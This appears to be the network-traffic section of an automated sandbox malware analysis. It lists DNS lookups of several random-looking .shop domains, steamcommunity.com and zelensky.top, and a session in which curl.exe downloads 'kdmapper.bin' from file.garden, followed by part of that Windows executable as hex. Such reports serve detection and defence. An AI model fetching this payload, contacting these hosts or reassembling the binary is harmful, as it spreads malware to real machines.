                                                                                                                                                                        Sep 30, 2024 18:19:12.877270937 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.877288103 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.924810886 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.924837112 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.924926043 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.924941063 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.924992085 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.924993038 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.925007105 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.925040960 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.925045967 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.925086021 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.925087929 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.925124884 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.961726904 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.961755037 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.138222933 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.138259888 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.138381958 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.141721010 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.141733885 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.789032936 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.789113045 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.792520046 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.792529106 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.792845011 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.843214989 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.861812115 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:15.907392025 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270400047 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270427942 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270472050 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270484924 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270507097 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.270510912 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270528078 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.270587921 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.270587921 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.359731913 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.359821081 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.359848022 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.359849930 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.359909058 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.362453938 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.362473965 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:16.362528086 CEST65264443192.168.2.7104.102.49.254
                                                                                                                                                                        Sep 30, 2024 18:19:16.362535000 CEST44365264104.102.49.254192.168.2.7
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Sep 30, 2024 18:19:08.854887962 CEST6070753192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:08.867727995 CEST53607071.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:14.537928104 CEST4943753192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:14.546919107 CEST53494371.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.018203974 CEST5977653192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.027813911 CEST53597761.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.031016111 CEST5205353192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.048768997 CEST53520531.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.051876068 CEST6124953192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.061055899 CEST53612491.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.063864946 CEST6313553192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.073913097 CEST53631351.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.076597929 CEST5948753192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.087165117 CEST53594871.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.089811087 CEST6043953192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.099920034 CEST53604391.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.102262020 CEST5823053192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.111754894 CEST53582301.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.114119053 CEST5095753192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.123739004 CEST53509571.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:15.126127958 CEST6391853192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:15.133461952 CEST53639181.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:47.543602943 CEST5626253192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:48.554064989 CEST5626253192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:19:48.580282927 CEST53562621.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:48.580482006 CEST53562621.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:20:13.263367891 CEST5582953192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:20:13.355524063 CEST53558291.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:20:21.134670973 CEST5105253192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:20:21.144263983 CEST53510521.1.1.1192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:20:30.074436903 CEST5468153192.168.2.71.1.1.1
                                                                                                                                                                        Sep 30, 2024 18:20:30.167287111 CEST53546811.1.1.1192.168.2.7
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Sep 30, 2024 18:19:08.854887962 CEST192.168.2.71.1.1.10xfea1Standard query (0)file.gardenA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:14.537928104 CEST192.168.2.71.1.1.10x40b7Standard query (0)tiddymarktwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.018203974 CEST192.168.2.71.1.1.10x1b98Standard query (0)surveriysiop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.031016111 CEST192.168.2.71.1.1.10x1357Standard query (0)captainynfanw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.051876068 CEST192.168.2.71.1.1.10xec3cStandard query (0)tearrybyiwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.063864946 CEST192.168.2.71.1.1.10x5fbeStandard query (0)appleboltelwk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.076597929 CEST192.168.2.71.1.1.10xbb7aStandard query (0)tendencerangej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.089811087 CEST192.168.2.71.1.1.10xe13cStandard query (0)fossillargeiw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.102262020 CEST192.168.2.71.1.1.10x16c0Standard query (0)coursedonnyre.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.114119053 CEST192.168.2.71.1.1.10x6884Standard query (0)strappystyio.shopA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.126127958 CEST192.168.2.71.1.1.10x3054Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:47.543602943 CEST192.168.2.71.1.1.10x3d41Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:48.554064989 CEST192.168.2.71.1.1.10x3d41Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:13.263367891 CEST192.168.2.71.1.1.10xf900Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:21.134670973 CEST192.168.2.71.1.1.10x8a7aStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:30.074436903 CEST192.168.2.71.1.1.10x681eStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Sep 30, 2024 18:19:08.867727995 CEST1.1.1.1192.168.2.70xfea1No error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:08.867727995 CEST1.1.1.1192.168.2.70xfea1No error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.027813911 CEST1.1.1.1192.168.2.70x1b98Name error (3)surveriysiop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.048768997 CEST1.1.1.1192.168.2.70x1357Name error (3)captainynfanw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.061055899 CEST1.1.1.1192.168.2.70xec3cName error (3)tearrybyiwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.073913097 CEST1.1.1.1192.168.2.70x5fbeName error (3)appleboltelwk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.087165117 CEST1.1.1.1192.168.2.70xbb7aName error (3)tendencerangej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.099920034 CEST1.1.1.1192.168.2.70xe13cName error (3)fossillargeiw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.111754894 CEST1.1.1.1192.168.2.70x16c0Name error (3)coursedonnyre.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.123739004 CEST1.1.1.1192.168.2.70x6884Name error (3)strappystyio.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:15.133461952 CEST1.1.1.1192.168.2.70x3054No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:48.580282927 CEST1.1.1.1192.168.2.70x3d41Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:19:48.580482006 CEST1.1.1.1192.168.2.70x3d41Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:13.355524063 CEST1.1.1.1192.168.2.70xf900Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:21.144263983 CEST1.1.1.1192.168.2.70x8a7aName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Sep 30, 2024 18:20:30.167287111 CEST1.1.1.1192.168.2.70x681eName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        • file.garden
                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.749701188.114.96.34436500C:\Windows\System32\curl.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-09-30 16:19:09 UTC104OUTGET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1
                                                                                                                                                                        Host: file.garden
                                                                                                                                                                        User-Agent: curl/7.83.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        2024-09-30 16:19:09 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 30 Sep 2024 16:19:09 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 2284739
                                                                                                                                                                        Connection: close
                                                                                                                                                                        x-powered-by: Express
                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                        content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                        last-modified: Fri, 20 Sep 2024 19:21:00 GMT
                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                        Age: 853068
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCzZKlRl3cpqXbQVPPXaLHjDtfEB00Jj93yJggZzOVwPgTGCuHp3i6AtUgwYNUG2ZKo57FZQNmibH1QbKGPifzi6nepx4UdUfbSpy8CpSNziE86j8vYdyEADRGQcqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8cb58870089419cf-EWR
                                                                                                                                                                        2024-09-30 16:19:09 UTC560INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d
                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii: .rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21 00 00 8a 80 a1 71 00 00
                                                                                                                                                                        Data Ascii: ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!q
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b cd 8b f8 8b f2 e8 13 ff
                                                                                                                                                                        Data Ascii: jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9 1e 02 00 59 8b 4d f4 8a
                                                                                                                                                                        Data Ascii: uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEPYM
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00 00 8b cf 89 83 00 11 00
                                                                                                                                                                        Data Ascii: ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe 75 74 0e 83 fe 01 75 0e
                                                                                                                                                                        Data Ascii: 3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!utu
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 8b 03 13 fa 0f
                                                                                                                                                                        Data Ascii: ;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6 83 dd 6c 00 00 01 e8 e2
                                                                                                                                                                        Data Ascii: !$auEktEkE(3PQx"EP!|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjDl
                                                                                                                                                                        2024-09-30 16:19:09 UTC1369INData Raw: ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00 00 8b 4d 58 8b c1 0b 45
                                                                                                                                                                        Data Ascii: "3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPKMXE


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.749704188.114.96.34435392C:\Windows\System32\curl.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
